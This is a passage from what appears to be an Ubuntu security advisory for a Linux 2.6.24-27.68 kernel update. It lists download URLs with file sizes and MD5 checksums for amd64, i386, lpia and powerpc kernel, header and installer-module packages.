  Size/MD5:    28610 d221605c4d4de8fd4d9f23c1bf955d39
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   224190 47789cbb5358f615ba9aad9617bc1b40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    52650 962e907eb399b9b517277fbbdf9edc29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    40646 d107bbf9a85ff4c2703160f26eb9a021
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    48650 c2247284c6a0eade9e0263dbc8b61b62
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    86330 7cb7a6873e6a20e258fedca59975821c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    36316 3a69ca20df1679f978bd0baf3c72251a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   648772 43743152dca42cd7443c3caf0287bd99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   209950 67129e31a185778a221a70391a38fa15
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    39192 ad2ac2a7fd96d5a7449f80f515b3aa9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    67990 01a6b245bf50638a3a737c9032988668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   145446 e1ab07b47571268c51d606c4449d9ab4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   287272 c6fec5eba4264266f770e6113a19a2d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:  2130720 ea730aab7b7d7a8486f047002a9da359
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.68_amd64.deb
  Size/MD5:   674786 2f243062075cfdaee443ecfb9b78ec80
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.68_amd64.deb
  Size/MD5:  1253848 81afd81221fa56f9b2f9eceaf66e159f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.68_amd64.deb
  Size/MD5:  1275698 e53286246e82b2f1a3e5b6d1ecc1b8db
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.68_amd64.deb
  Size/MD5:   674962 f548fd2121a3d56e18c2d75363cdf156
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.68_amd64.deb
  Size/MD5:  1085708 1dfc4b3475d8d5e72cab75fbea6ae503
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.68_amd64.deb
  Size/MD5: 17809528 759c656058751ad36cc6a8b64a0b402d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.68_amd64.deb
  Size/MD5: 17782706 d90be8c9f58ca9fdbc4785e4f96104e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.68_amd64.deb
  Size/MD5: 21057826 b880205379c7186e27eb85841ab29266
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.68_amd64.deb
  Size/MD5: 21433636 564a0f9386bbc5161c4b02a0f9a0ce14
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_amd64.deb
  Size/MD5:   708238 586f0a220cb3de5be70aa2bd976b35fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   263664 edd5c15c65863f831c7bf063ed4c78e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   176420 8e4e4fda2b2ac38909948ba2e2c441ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   254118 4f8c8dbe4767a22bff88824f884284f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:  1641146 7e64045e85894696a193e1525005089c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   143720 aad29b2008b96c933acc347cc2484974
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   164470 dd788bad411f04d0d23eb732edd368c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   115860 5e75c93921ab740cbd72f44d13d71cab
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    35056 92d739d7e961d1c561f3d211e7543707
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    64404 b970ba774b7bf10fc931a65da31beb89
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    69712 b110c422479e541fb5d42d66974f8824
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    21598 cf69df47e7d957edd8e1748c1fee081f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:     8620 49f7c102dfb907be4af83c5c042ce402
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    57230 5c6560857419594a92e41568beeed6f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   103042 1e80b33446b03fd2163fe137d290e477
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:  1212574 10793b3c5b1152913467116b35cd8d78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    45492 a13c87491d1c5d4a88c85077f9293335
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    12776 f785f496dc20c7fc474b05d00dee4565
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:   498968 2af8782dfac6870326396f14151ee48e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.68_amd64.udeb
  Size/MD5:    75054 916713c3d0e5fb5f862e4d111c9e5159
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.68_amd64.deb
  Size/MD5: 19261560 f263d75824550b6741f2a824f15ca788
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.68_amd64.deb
  Size/MD5: 17914938 14cf693883a1bbfb865ee6f9fc17b6da
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.68_amd64.deb
  Size/MD5: 18915966 0b442706ac908da36518814216f962ff

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    23696 329de678a31d3d386dc5d37cef0457b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    26798 b032666b823fed05400463841ebaa210
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   218808 e90e51118dd5104662a091b65220b297
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   220480 a365b410311a1888e1d98c856a91dab3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    51926 025795743665eb402bc234555c6b39e0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    52066 e31ea61183783cf6613e25628beed063
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    38322 6f67b8ba8248e0583f4793eac9370ec3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    39074 97bbbba051b764e683b7731bbf4c21c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    45992 237db20c6a4b37bf8daa23c210d289a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    46168 b3a0e41bd46c1972f5fc0b93bb635847
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    83250 48e9848e5a1fbad96ed520b0d45bb1c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    83656 7c36457138892caa165707c6194499eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    32392 6515754e92d16cd83dc4de73e5070629
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    32670 54135044da2e8cc753887f230fbbc3c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   637744 ce993f7f0caea7d6ee17f458366b05b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   655908 89b222b67d295a466b8be36a30273c98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   209854 5c102e8ac383a9c3a237dc22adcb355d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   213610 d72153cf8c10f2368b827e86c9ba1c29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    46562 4ba2f6975424f4815a0a50f2de7e7f67
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    47604 4d471e236046ad59e0cda27f760d703b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    62272 570a7795e145cd484abc520448352590
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    63632 09b4ee0122665857d918e7381042a055
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   130544 7e832ae2f446f43b42217bf0ad46f088
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   137028 e98d42f6964ddc1bbe641879b5139614
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   279076 b3e2340e032340e1e875131de541ec25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   277686 d3b7c9e6a0face374f12dd77d3835e18
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:  2012902 541fb03ff6a72f3d3854037fcda9d744
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:  2089036 6ce3fe1b19c19d54675c9ec12c792775
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.68_i386.deb
  Size/MD5:   656024 596d1a15554f7778c4288b04b8fc802c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.68_i386.deb
  Size/MD5:   658656 193f1939073ad97fe3fa704791e88de9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.68_i386.deb
  Size/MD5:  1244894 5efcdeb0ece441cbdbae8ebe3dd6021e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.68_i386.deb
  Size/MD5:  1263366 de1454c802b2fd30b743e42d28d3bb6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.68_i386.deb
  Size/MD5:   660432 ec584391487d7d947f108f5422efb0f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.68_i386.deb
  Size/MD5:   562622 e6161052828c558c1b9a50a00f58913e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.68_i386.deb
  Size/MD5:  1060278 34db9506f97f5cbbb4f6727efbbc247f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.68_i386.deb
  Size/MD5: 18386442 57542c984a13b64049a329f8ea1e5e18
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.68_i386.deb
  Size/MD5: 18401904 f3383611cacb0e44484689eb4e8d31f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.68_i386.deb
  Size/MD5: 18514810 6b382004498cd95a9c4b96cfc2bcead3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.68_i386.deb
  Size/MD5:  8733442 5291c5342dfa92ce21ba6f0e5d66a88e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.68_i386.deb
  Size/MD5: 25545652 9e1adbc41aadc37b4d4dfae06db05628
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.68_i386.deb
  Size/MD5: 26359094 5c17d02a32605554a4d866e6441f7585
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.68_i386.deb
  Size/MD5: 27383080 7293c6615b1c0d7426e2d1025f325b53
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.68_i386.deb
  Size/MD5: 24878278 29ba5c38edea2be1f6314f7313747112
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_i386.deb
  Size/MD5:   708220 31f3da7eabcd06ec0849399df4f27575
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   258826 2ed2209e04268dd25263895cb88f9a12
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   264150 214cceae24e859b36e3c36463aeb25b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   163266 2036485b44265afd417d510c240be06b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   163024 eabc8daf7d8bc770fc398eff9ba0e93b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   236718 7a0d01c4124bb1317cd6992182117b6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   244982 d12427575d3702e14b08ea3988f52af4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:  1810028 94150212b443ae1225c31c80a1cb8770
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:  1827240 14129d49a8642945705ff002598f9057
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   150838 cf4e6bcf3b84af3f094fb5cb816b8161
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   143020 2f12b04ccca3ebe26c43a576f5e03cf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   156078 80863f3d547a79ef882a54eb20c41b40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   157148 d0f88b5521269cad550349374d4a2c26
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   107220 5450f2a8c3bb9dc1bd05399e4884e764
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   108512 8d7d316614dcb75277305f50f2f66310
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    32960 4ba131c497e30aae60b7c08ad1e91fdf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    33390 1f43b1ed2df0850139f25c266b865ac5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    60684 982bf0bbb3554f5bf15cee3b0f667d6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    61154 6becce2fc9fca9ac242f67505afb31cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    82650 801dc2529d81d4cf7fc024988dc6dcce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    82960 912e4d26c1c1f71aa56fb828f39fd200
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    48526 dff0af69747021b3207cd81060880e44
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    48458 99bbfe23bd95188bdf21ca89ababc651
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:     8188 f0276785fc60ebd6d7261b517a0c8d3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:     8440 cd9c33f032973bfc9fd1ef6956266edc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    51108 1dfb52458d47c81516eecdda1a7c388d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    52942 fe3c6e062f3ce8ffe11d2f875ebcd401
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    92152 a69e8d73c99894351b3d6240339eb32f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    92440 e3948a2976aca9b6105f8aa5f71f47a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:  1443718 d00660a064bf060f629ce78e1d4abedb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:  1427006 586bde26554bf32873a8357740f88ef0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    43238 0684da1101af11c9b3fe3750a38de6b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    42806 34bf3e51745417cebd2ea596fa433bc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    11404 86457f6b83a89e02e857d885cd1cf3cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    12016 d224a53c023006435c95ca2255e5928c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:   471454 8ec2b608ed602c2823a71bf9a76347b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:   473356 919954de23b3b5f205ef21e4cfabad0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.68_i386.udeb
  Size/MD5:    70514 d89b662b7a144853c6fbc1d9ce3e939a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.68_i386.udeb
  Size/MD5:    71382 8b8bb32b68a064f06ad01d00e2d0c213
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.68_i386.deb
  Size/MD5: 20251706 3c1368f9786eedcfa84909b4369b46c0
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.68_i386.deb
  Size/MD5: 18546208 c574c0ba71d87dea4ee61b369d402c59
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.68_i386.deb
  Size/MD5: 18786092 812e5973c0684ee468a2af1dfd3770ce

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.68_lpia.deb
  Size/MD5:   640380 66419ec10bab050af7db91dc09a05d61
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.68_lpia.deb
  Size/MD5:   706332 facf8a262b488e24c9f82066a4beecf8
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.68_lpia.deb
  Size/MD5:   708196 fd8eaf91f19d0db7b90158b85b9a4b47
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.68_lpia.deb
  Size/MD5: 14517450 d95d9fef00a1dd58d58ff852a359cd46
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.68_lpia.deb
  Size/MD5: 19822718 3d1467b01cfac713e23962e3afe7fcff

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   334056 2c0185e202b2ee98e180241aeef9eac9
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   318530 da1faf28b2e3b5ff42ede65cbc6bb7b4
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    62718 2f034ef64dba8f19457b384cfdc6c506
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    73004 02010621529a19ca7cd2c59bee6b8a65
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    41448 7b4c91974c6c57060a003f7cec23ea52
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    47828 665a6f1abdf5a8e559fb8c6fe4b7422c
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    89496 b1f411d42e2c510c37b8a7d80ce80583
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   105746 f4fcded5be6c38fd615ab54fe133f694
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    44830 1b504f5b8d242fa68e3c723a11970390
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    40932 daaa5482e126556c1d294bb45a618a6b
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   704812 a3478a3fdd0e65d6c14122381f0fcf09
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   771062 f21b052d6aeaf679f2b76f6eca4e8569
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   243316 2b6c5e07da92ff5091c75cc7ff841c05
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   246228 37f8d614856390770bc6c52d628e8786
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:    69156 af8913d8c0c76f56ddf3e9ddeac80024
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.68_powerpc.udeb
  Size/MD5:   132586 449cbdf1563afdfafafd6c5639c4ae5d
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.68_powerpc.udeb
